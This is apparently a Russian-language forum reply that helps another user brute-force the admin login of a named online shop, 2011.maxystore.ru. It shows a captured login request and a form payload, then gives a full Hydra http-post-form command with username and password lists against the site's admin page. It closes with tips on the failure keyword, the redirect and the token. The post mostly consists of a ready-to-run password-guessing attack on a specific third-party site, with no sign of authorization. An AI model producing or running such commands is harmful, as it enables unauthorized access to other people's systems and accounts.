Code: HEADERS Accept: */* Accept-Encoding: gzip, deflate Content-Length: 27 Content-Type: application/x-www-form-urlencoded User-Agent: runscope/0.1 QUERYSTRING route: common/login PARAMETERS password: demo username: demo BODY username=demo&password=demo Вообще там Content-Type: multipart/form-data Payload должен выглядеть как-то так Code: ------WebKitFormBoundarypeTHmaEyYDJ1cZXG Content-Disposition: form-data; name="username" demo ------WebKitFormBoundarypeTHmaEyYDJ1cZXG Content-Disposition: form-data; name="password" demo ------WebKitFormBoundarypeTHmaEyYDJ1cZXG-- хз гидры нет под рукой, да и никогда небыло) нупримерно так по FAQ попробуй Code: $ hydra -L "logins path" -P "pass.txt path" http://2011.maxystore.ru/admin/index.php http-post-form "route=common/login:username=^USER^&password=^PASS:alert-danger" p.s. alert-danger - invalid keyword (хз как в гидре, я указал кейворд тега.. ибо plain text там на русском весь, а юникод консоли не любят) p.s.s. не забывай про редирект после отправки данных формы, и с редиректом выдается токен p.s.s.s. почему именно гидра ?....